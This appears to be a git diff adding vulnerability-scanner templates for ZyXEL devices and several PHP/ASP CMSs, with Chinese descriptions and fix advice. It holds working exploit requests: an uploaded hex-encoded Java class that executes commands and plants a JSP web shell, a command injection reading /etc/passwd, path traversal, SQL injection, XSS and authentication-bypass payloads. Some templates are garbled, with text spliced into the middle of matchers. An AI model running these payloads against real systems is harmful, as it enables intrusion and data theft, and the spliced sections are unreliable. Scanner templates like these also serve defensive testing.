+ --8b1ab266c41afb773af2e064bc526458--
+ - |
+ POST /./RestAPI/LogonCustomization HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b
+
+ --43992a07d9a30213782780204a9f032b
+ Content-Disposition: form-data; name="methodToCall"
+
+ unspecified
+ --43992a07d9a30213782780204a9f032b
+ Content-Disposition: form-data; name="Save"
+
+ yes
+ --43992a07d9a30213782780204a9f032b
+ Content-Disposition: form-data; name="form"
+
+ smartcard
+ --43992a07d9a30213782780204a9f032b
+ Content-Disposition: form-data; name="operation"
+
+ Add
+ --43992a07d9a30213782780204a9f032b
+ Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class"
+
+ {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}
+ --43992a07d9a30213782780204a9f032b--
+ - |
+ POST /./RestAPI/Connection HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22
+ - |
+ GET /help/admin-guide/test.jsp HTTP/1.1
+ Host: {{Hostname}}
diff --git "a/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml" "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml"
new file mode 100755
index 000000000..d0362e376
--- /dev/null
+++ "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml"
@@ -0,0 +1,29 @@
+id: CVE-2019-9955
+info:
+ name: Zyxel - Reflected Cross-site Scripting
+ author:
+ - l0ne1y
+ description: |-
+ 多款ZyXEL产品跨站脚本漏洞
+ ZyXEL ZyWall 310等都是中国台湾合勤(ZyXEL)公司的产品。ZyXEL ZyWall 310是一款310系列VPN防火墙设备。ZyXEL ZyWall 110是一款110系列VPN防火墙设备。ZyXEL USG1900是一款下一代统一安全网关设备。
+
+ 多款Zyxel产品中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。以下产品受到影响:Zyxel ATP200、ATP500、ATP800、USG20-VPN、USG20W-VPN、USG40、USG40W、USG60、USG60W、USG110、USG210、USG310、USG1100、USG1900、USG2200-VPN、ZyWALL 110、ZyWALL 310、ZyWALL 1100。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://www.zyxel.com/
+
+ 临时修复方案:
+ 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。
+requests:
+- matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - '";alert(''1'');//'
+ - Welcome
+ path:
+ - '{{BaseURL}}/?mp_idx=%22;alert(%271%27);//'
+ method: GET
diff --git "a/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml" "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml"
new file mode 100755
index 000000000..1568a33c5
--- /dev/null
+++ "b/config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml"
@@ -0,0 +1,25 @@
+id: CVE-2020-9054
+info:
+ name: Zyxel NAS Firmware 5.21- Remote Code Execution
+ author:
+ - l0ne1y
+ description: |-
+ 多款ZyXEL产品操作系统命令注入漏洞
+ 多款ZyXEL产品中存在操作系统命令注入漏洞。远程攻击者可借助特制的HTTP POST或GET请求利用该漏洞执行任意代码。以下产品及版本受到影响:使用V5.21(AAZF.7)C0之前版本固件的NAS326;使用V5.21(AASZ.3)C0之前版本固件的NAS520;使用V5.21(AATB.4)C0之前版本固件的NAS540;使用V5.21(ABAG.4)C0之前版本固件的NAS542;ZyXEL NSA210;ZyXEL NSA220;ZyXEL NSA220+;ZyXEL NSA221;ZyXEL NSA310;ZyXEL NSA310S;ZyXEL NSA320;ZyXEL NSA320S;ZyXEL NSA325;ZyXEL NSA325v2。
+ severity: critical
+ remediation: |-
+ 官方修复方案:
+ 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - 'root:.*:0:0:'
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin'';cat /etc/passwd'
+ method: GET
diff --git "a/config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml" "b/config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml"
new file mode 100755
index 000000000..735b599ed
--- /dev/null
+++ "b/config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml"
@@ -0,0 +1,36 @@
+id: CVE-2018-19326
+info:
+ name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
+ author:
+ - l0ne1y
+ description: |-
+ Zyxel VMG1312-B10D 任意文件读取漏洞
+ Zyxel VMG1312-B10D是合勤(ZyXEL)科技公司的一款无线网关设备。
+
+ Zyxel VMG1312-B10D 5.13(AAXA.8)C0之前版本中存在任意文件读取漏洞。攻击者可借助‘../’目录遍历序列利用该漏洞访问任意文件。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://www.zyxel.com/
+
+ 临时修复方案:
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+ - type: word
+ part: header
+ words:
+ - application/octet-stream
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/../../../../../../../../../../../../etc/passwd'
+ method: GET
diff --git "a/config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml" "b/config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml"
new file mode 100755
index 000000000..01157e6f1
--- /dev/null
+++ "b/config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml"
@@ -0,0 +1,32 @@
+id: CVE-2021-3297
+info:
+ name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
+ author:
+ - l0ne1y
+ description: |-
+ Zyxel NBG2105 认证绕过漏洞
+ Zyxel NBG2105是中国合勤科技(Zyxel)公司的一款路由器。
+
+ Zyxel NBG2105 V1.00 存在安全漏洞,该漏洞源于设置登录cookie提供了管理员权限。
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ https://www.zyxel.com/us/en/support/security_advisories.shtml
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ condition: and
+ words:
+ - Running Time
+ - Firmware Version
+ - Firmware Build Time
+ matchers-condition: and
+ raw:
+ - |
+ GET /status.htm HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: language=en; login=1
diff --git a/config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml b/config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml
new file mode 100755
index 000000000..22507ce36
--- /dev/null
+++ b/config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml
@@ -0,0 +1,44 @@
+id: ahwebexperts-car-details-sqli
+info:
+ name: ahwebexperts_car-details.php?uid=注入
+ author:
+ - jim2g
+ description: |
+ ahwebexperts_car-details.php?uid=存在SQL注入
+ 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。
+ 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_1==200&&status_code_2==200&&status_code_3==200
+ - contains(body_1,"Time")
+ - contains(body_2,"Warning")
+ - body_1!=body_2
+ - body_2==body_3
+ raw:
+ - |
+ GET /car-details.php?uid=8%27%20AND%202988=2988%20AND%20%27KcEp%27=%27KcEp HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /car-details.php?uid=8%27%20AND%202988=2986%20AND%20%27KcEp%27=%27KcEp HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /car-details.php?uid=8%27%20AND%202988=2986%20AND%20%27KcEp%27=%27KcEp HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml b/config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml
new file mode 100755
index 000000000..98ff91576
--- /dev/null
+++ b/config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml
@@ -0,0 +1,44 @@
+id: ahwebexperts-pagephp-sqli
+info:
+ name: ahwebexperts_page.php?page_id=注入
+ author:
+ - jim2g
+ description: |
+ ahwebexperts_page.php?page_id=存在SQL注入漏洞
+ 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。
+ 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_1==200&&status_code_2==200&&status_code_3==200
+ - contains(body_1,'g\">&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_1==200&&status_code_2==200&&status_code_3==200
+ - contains(body_1,"Products")
+ - contains(body_2,"No Product Available")
+ - body_1!=body_2
+ - body_2==body_3
+ raw:
+ - |
+ GET /product.php?cat=11%27%20AND%208565=8565%20AND%20%27TVmM%27=%27TVmM HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /product.php?cat=11%27%20AND%208565=8564%20AND%20%27TVmM%27=%27TVmM HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /product.php?cat=11%27%20AND%208565=8564%20AND%20%27TVmM%27=%27TVmM HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml b/config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml
new file mode 100755
index 000000000..848cb3920
--- /dev/null
+++ b/config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml
@@ -0,0 +1,33 @@
+id: Arcms-json_newslist-sqli
+info:
+ name: Arcms json_newslist limit sql注入
+ author:
+ - jim2g
+ description: "Arcms-json_newslist-存在SQL注入漏洞\n arcms是一套基于layui和arphp的内容管理系统。\n\narcms
+ 2018-03-19及之前版本中的ctl/main/Json.php、ctl/main/service/Data.php和comp/Db/Mysql.php文件存在SQL注入漏洞。远程攻击者可通过向json/newslist发送‘limit’参数利用该漏洞执行SQL命令。 "
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ /~https://github.com/assnr/arcms
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'202cb962ac59075b964b07152d234b7')
+ raw:
+ - |
+ GET /json/newslist?key=111&limit=1%20procedure%20analyse(extractvalue(rand(),concat(0x7e,md5(123))),1) HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml b/config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml
new file mode 100755
index 000000000..8a76e7dbd
--- /dev/null
+++ b/config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml
@@ -0,0 +1,32 @@
+id: CNVD-2018-26783_1
+info:
+ name: arcms img_images 未授权访问漏洞
+ author:
+ - jim2g
+ description: "arcms img_images 未授权访问漏洞\narcms是一套基于layui和arphp的内容管理系统。\n\narcms 2018-03-19及之前版本中存在安全漏洞,该漏洞源于程序未能对index/main、user/useradd或img/images进行身份验证。攻击者可利用该漏洞获取未授权的访问权限。 "
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://nvd.nist.gov/vuln/detail/CVE-2018-19557
+ 临时修复方案:
+ 1、前后端同时对用户输入信息进行校验,双重验证机制。
+ 2、调用功能前验证用户是否有权限调用相关功能。
+ 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
+ 4、采用成熟的权限管理框架,如spring security。
+ 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
+ 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
+ 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'图片总数')
+ - contains(body,'批量删除')
+ raw:
+ - |
+ GET /img/images HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml b/config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml
new file mode 100755
index 000000000..0c13bc356
--- /dev/null
+++ b/config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml
@@ -0,0 +1,35 @@
+id: bartarcms-allgallary-sqli
+info:
+ name: bartarcms_allgallary.php_idcat=注入
+ author:
+ - jim2g
+ description: |
+ arcms-bartarcms_allgallary.php_idcat存在SQL注入漏洞
+ 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。
+ 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'202cb962ac59075b964b07152d234b70')
+ raw:
+ - |
+ GET /pages/allgallary.php?idcatall=2&idcat=-2171%27%20UNION%20ALL%20SELECT%20CONCAT(0x7176707071,md5(123),0x7178767671)--%20UgIm HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml b/config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml
new file mode 100755
index 000000000..8306d52dc
--- /dev/null
+++ b/config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml
@@ -0,0 +1,42 @@
+id: AspCms_OEM-info
+info:
+ name: aspcms AspCms_OEM.asp逻辑漏洞暴露登陆地址
+ author:
+ - jim2g
+ description: |-
+ ASPCMS信息泄漏漏洞
+ ASPCMS最新版2.5.2以及ASPCMS2.3.x都存在这个问题,应该是通杀 在ASPCMS2.3.x中,ASPCMS的数据库在/data/目录下,为了防止数据库被下载,把数据库文件data.mdb重新命名为#data.asp,由于设置不当,使用%23编码#即可绕过访问,导致信息泄漏: http://127.0.0.1/data/%23data.asp 在最新版的2.5.2中,把数据库文件aspcms252.mdb重新命名为#aspcms252.asp,由于配置不当,使用%23编码#即可绕过访问,导致信息泄漏: http://127.0.0.1/data/%23aspcms252.asp 此问题通杀所有版本。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: or
+ dsl:
+ - status_code==200
+ - status_code==500
+ - type: dsl
+ condition: and
+ dsl:
+ - contains(body,'Standard Jet DB')
+ raw:
+ - |
+ GET /data/%23aspcms252.asp HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /data/%23data.asp HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml b/config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml
new file mode 100755
index 000000000..2df32d6c9
--- /dev/null
+++ b/config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml
@@ -0,0 +1,51 @@
+id: Aspcms-Backend-Leak
+info:
+ name: Aspcms后台地址泄露
+ author:
+ - l0ne1y
+ description: |-
+ aspcms后台地址泄露
+ aspcms的自带插件都存在泄露后台地址的漏洞。 例如/plug/oem/AspCms_OEMFun.asp文件
+ severity: low
+ remediation: |-
+ **官方修复方案:**
+ 暂无
+
+ **临时修复方案**
+ 1、后台管理系统禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。
+ 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。
+ 3、限制IP访问,绑定固定的IP访问后台管理系统。
+ 4、采用成熟的权限管理框架,如spring security。
+requests:
+- matchers:
+ - type: word
+ condition: and
+ words:
+ - ")
+ raw:
+ - |
+ GET /financial_times.php?issue=%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml b/config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml
new file mode 100755
index 000000000..11707663b
--- /dev/null
+++ b/config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml
@@ -0,0 +1,35 @@
+id: btoptionscom-hbr_php-sqli
+info:
+ name: btoptionscom_hbr_php_issue_sql联合注入
+ author:
+ - jim2g
+ description: |
+ btoptionscom_hbr_php_issue_sql联合注入
+ 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。
+ 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。
+ severity: high
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,"202cb962ac59075b964b07152d234b70")
+ raw:
+ - |
+ GET /hbr.php?issue=12%20and%20(select%204386%20from(select%20count(*)%2cconcat(md5(123)%2c(select%20(elt(4386%3d4386%2c1)))%2c0x716b7a6271%2cfloor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a) HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml b/config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml
new file mode 100755
index 000000000..e65eb4bee
--- /dev/null
+++ b/config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml
@@ -0,0 +1,35 @@
+id: btoptionscom-newspack-sqli
+info:
+ name: btoptionscom_newspack_php_issue_sql联合注入
+ author:
+ - jim2g
+ description: |
+ btoptionscom_newspack_php_issue_sql联合注入
+ 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。
